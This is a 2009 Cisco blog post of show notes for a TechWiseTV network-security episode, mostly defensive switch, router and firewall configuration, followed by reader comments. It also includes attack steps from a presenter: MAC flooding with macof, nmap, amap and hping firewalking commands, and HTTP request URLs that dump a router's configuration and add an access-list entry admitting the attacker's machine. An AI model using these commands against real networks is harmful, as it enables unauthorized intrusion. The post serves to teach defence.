Cisco Blogs


Cisco Blog > Cisco Interaction Network

ShowNotes: Network Security Survival Guide

November 19, 2009
at 12:00 pm PST

 

TWTV56

Welcome to the Show Notes!  Are you here because you clicked the shownotes link while watching the show?  OR…have you not NOT seen the show…or just need to share it? All our shows can be found anytime at techwisetv.com but you can get to the official registration page quite quickly by clicking here.

This is a great one today…you really must watch it..its security silly! The topic that just never quits… I apologize you get to see a lot of Jimmy Ray and I on this one…a few less guests than normal but we got the goods!  The idea was to really narrow down the control points that still remain when your network is no longer identified by a physical entity or easily defined presence if you will.  We took advantage of Jimmy Ray’s hacker skills and did our best to to walk in his shoes..what would he do? Where would he go? We flip it around each time of course and show what YOU would do in response….

The promo if you missed it:

Here is what we promised…


Are your routers, switches or perhaps ‘other’ network elements… inadvertently revealing critical information about your network to hackers? Could your firewalls and other security appliances actually be increasing your vulnerability to intruders?

 In today’s era of borderless networks, minimizing your exposure to outside threats is more essential than ever. Find out how you can reduce the potential attack surfaces available to data thieves without buying any new hardware or software. Our security penetration experts will demonstrate the latest methods employed by hackers to gain access to your network and show you how to eliminate these threats.

Learn the simple, fundamental steps you can take right now to strengthen your network security using the foundational technologies you already have. Discover the valuable free documentation from Cisco that will enable you to implement enterprise customer-proven security strategies and procedures as we reveal:

 

  • How intruders “firewalk” your firewalls and how to stop them
  • How unused protocols and ports can emit valuable information about your network
  • Why headend routers have suddenly become the “entry point of choice” for hackers and how to lock them down
  • The critical importance of keeping your Cisco IOS Software up to date

Everything is a Target

Robb Boyd - TechWiseTV56

Security has historically always been about fences.  We have always wanted to define an edge and be able to cleanly state, which side is ‘clean’ and which side is ‘dirty.’  Anything that must pass between the two edges is of course subject to all manner of inspection, authorization and so forth.  The challenge of course is that this does not work in the real world.  It is much too brittle. When it breaks, too many other things fail in the process.  There is quite simply, too much gray area.

One logical question that comes up in our ‘Building Borderless Networks’ series is the clarificaiton of whether ‘’Borderless” equals “insecure.”  

Good question I guess…the answer is of course, ‘No.’

The relationship between ‘Constraints’ and ‘Performance.’   

Do you ever hear anyone brag about the brakes on their sports car? It may seem counterintuitive but one could easily argue that brakes may be the most critical element for going fast.  How fast would you drive if you had no brakes?

In the same manner, how fast can your company (or your network), respond to changing conditions? Can you imagine being held back by your technology over fear that a merger, or an expansion, new office growth in foreign places, you name it – will allow you to become over exposed?  The honest truth, and you techies know this, – management may not be that fearful but that lack of fear is not confidence…its quite often, ignorance.

A borderless network equates to an ability to pursue the right business decisions without regard for the ability of the network to support it.  Each step we take in our ‘Building Borderless Networks’ series adds another important angle to how you can make this a reality.

In today’s show, we look at the borderless network from the outside. A frank look at the attack surface present in a borderless network and the simple things that can be done about it.

Borderless does not mean Exposed.  

We will take each of the fundamental building blocks covered in this series and systematically address how the vulnerabilities can be discovered and the often-simple things that can be done to seal them up. Since this is TechWiseTV, we are not just talking about them, we are going to ‘do them’ so that you can not only understand exactly what is being done but you can easily see how to apply them to your situation.

Jimmy Ray Purser Schools Robb on Yersinia

Segment 2: Turn It Off

Dramatically reduce potential attack surfaces available to intruders by turning off unused ports and protocols.

Grooming a port for Layer 2 deployment:
MAC flooding:
(Prevents MACOF and other MAC flooders)
sh mac-address-table dynamic vlan 1
sh mac-address count
macof
sh mac-address count
ping 192.168.1.5
sh ip arp 192.168.1.5
sh mac-add address <from above>

prevent:
(for CS-Mars)
mac-address-table notification mac-move
int gigabit eth 1/0/13
switchport port security
sh port-sec int gigabit eth 1/0/13

STP:
Older way:
conf t
int gigabit eth 1/0/13
spanning-tree root guard

conf t
int gigabit eth 1/0/13
bpduguard enable
exit

errdisable recovery cause bpduguard
errdisable recovery inter 30

DTP:
conf t
int gigeth 1/0/13
switchport mode access

DHCP Snooping/IP Source Guard/DIA:
(This prevents tools like Goobler from DHCP exhaustion)
ip dhcp snooping
ip dhcp snooping vlan 1
ip dhcp snooping verify mac-add

ip arp inspection vlan 1

interface FastEthernet 0/10
     switchport
     switchport mode access
     switchport access vlan 100
     ip verify source

From Jimmy Ray:

Download Yersinia and read my blog entry on how to use it and other hacking tools.

You’ll be surprised how many times the simple web GET works on a router:
http://ip_address_of_router/level/99/exec/show/config
and if it does, you can do stuff like this:
http://ip_address_of_router/level/99/configure/access-list/102/permit/ip/host/my_hacking_machine_IP_addr/any/CR

oh yeah…skies the limit here.

Jimmy Ray - Animated

Segment 3: Firewalk

How data thieves might actually be using security appliances like your firewalls to help them do their dirty work.

Firewalking:
Discover it with NMAP
nmap -sV -T4 -vv -0 192.168.1.3
nmap -sS -sV -O -p- -PI -PT -PN 192.168.1.3
I like to feed the results thru AMAP for additional mining:
nmap -sS -oM results.nmap -p 1-65535 TARGET” of course)
   # amap -i results.nmap -o results.amap -m

nmap -oM amap.nmap -sT -O -p 1-65000 192.168.0.3; amap -i    amap.nmap
Then use hping2 to firewalk it:
hping -I eth0 -z -t 6 -S mail.test.com -p 143

BotNet filter initial config:
dns domain-lookup outside
dns server-group DefaultDNS
name-server 172.16.1.4
domain-name techwisetv.cisco.com
dynamic-filter updater-client enable
dynamic-filter use-database
access-list dynamic-filter_acl extended permit ip any any
dynamic-filter enable interface outside classify-list dynamic-filter_acl
class-map dynamic-filter_snoop_class
match port udp eq domain
policy-map dynamic-filter_snoop_policy
class dynamic-filter_snoop_class
inspect dns dynamic-filter-snoop
service-policy dynamic-filter_snoop_policy interface outside

Segment 4: In the Air Tonight

Secure the wireless network with integrated radio frequency (RF) intrusion prevention

Chris Kozup

 

More info on wireless can always be found at go/wireless of course.

Segment 5: Router Leakage

Learn why headend routers have suddenly become the “target of choice” of hackers, how they can be hijacked with a simple web browser application, and how to prevent this from happening.  

Grooming a port for Layer 3 deployment
no ip source-route
no ip gratuitous-arps
no service pad
int gigabit eth 0/0
ip verify unicast reverse-path
passive-int default (RIP only. Use stub with OSPF or this command will step the routing process)

Zone Based Firewall example config with support for WAAS:
class-map type inspect most-traffic
match protocol icmp    
match protocol ftp
match protocol tcp
match protocol udp
policy—map type inspect WAAS
class type inspect most—traffic
inspect
class class—default
zone security zone-hr
zone security zone-outside
zone security z-waas
zone—pair security hr—out source zone-hr destination zone-outside
service—policy type inspect p1
zone—pair security out—hr source zone-outside destination zone-hr
service—policy type inspect p1

interface GigabitEthernet0/0
description Trusted interface
ipaddress 10.70.0.1 255.255.255.0
ip wccp 61 redirect in
zone—member security zone-hr

interface GigabitEthernet0/1
description Untrusted interface
ipaddress 10.72.2.3 255.255.255.0
ip wccp 62 redirect in
zone—member security zone-outside
interface Integrated—Service—Enginel/0
ipaddress 10.70.100.1 255.255.255.252
ip wccp redirect exclude in
zone—member security z-waas

Segment 6: Secure Design

Discover the valuable free resources from Cisco that enable you to implement enterprise customer-proven security strategies and solutions.

SAFE  -- Cisco.com/go/safe
Security Intelligence Service
Design Zone

In an effort to keep conversations fresh, Cisco Blogs closes comments after 60 days. Please visit the Cisco Blogs hub page for the latest content.

11 Comments.


  1. I am not a techie but try read and implement security measures for my wireless network. I really like the idea of Securing wireless network with integrated radio frequency intrusion preventionHaving said that, most casual users like me don’t even know how to operate a software firewall. There really need to be a external device that is plug and secure type.

       0 likes

  2. I own a small business and do most of the IT”” work myself, so I’m no expert. I always have concerns about whether my network is secure enough to protect my business. How do I know which router will give me the most protection?”

       0 likes

  3. I agree with your all opinions given by you in your post.Thanks for discussing about.Waiting for your next post like this.

       0 likes

  4. wow, some advanced techniques in the show (for me anyway). Thanks !

       0 likes

  5. Most current routers (especially IOS baed ones) would allow any sane person to lock their network hard enough to avoid intrusions. Any public protocol should be kept on a DMZ host outside the private area.. The problem though these days is not physical security but the vast amount of keyloggers trojans etc.. infected websites out there that would, if you get infected, render any physical security you may have on your router a completely wasted effort… My advice – don’t ignore virus/malware protection in your network security strategy.Good luck

       0 likes

  6. I am also a business owner who handles most of the technical work “in house”. I need to become more confident in the ability of my firewall and network security. I put trust in my anti-virus & anti-spyware, but I’d like to be surer. Your TV show is probably just what I need. I’ll watch it!

       0 likes

  7. Same as above, the routers are a very important part of today.

       0 likes

  8. Security is indeed a big part of today’s society, or at least it should be.

       0 likes

  9. Security is indeed a big part of today’s society, or at least it should be.

       0 likes

  10. Security is indeed a big part of today’s society, or at least it should be.

       0 likes

  11. Network Security is really very important nowadays that many hackers are creeping on other people’s important information. Business owners must make their information technology network secured from these online terrorists.

       0 likes